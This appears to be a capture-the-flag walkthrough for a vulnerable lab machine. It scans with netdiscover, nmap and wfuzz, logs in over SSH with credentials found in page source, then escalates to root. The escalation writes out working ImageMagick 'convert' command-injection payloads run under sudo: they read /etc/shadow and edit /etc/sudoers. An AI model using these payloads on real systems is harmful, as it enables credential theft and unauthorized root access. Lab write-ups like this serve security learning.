• netdiscover
  • Nmap
  • Wfuzz
  • Nikto


ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Multiple Vulnerabilities

Use netdiscover to detect target IP address

netdiscover -i eth0 -r is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

port 22 and 80 are opening.

use wfuzz to scan

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

Nothing cool come out.

check the webpage, find a file davinci.htm. Double click it.

Not useful

check the souce code:

Get a potential username/password margo:god.

login ssh:

get the shell.

Now lets try to get root

sudo -l

try to execute this program

ImageMagick ????

searchsploit ImageMagick

I used that exploit.

convert '"|ls "-la' out.png


now try:

sudo convert '"|cat "/etc/shadow' out.png


modify the /etc/sudoers

sudo convert '"|vim "/etc/sudoers' out.png

save and quit.

ssh to the box as margo,

sudo su

Game Over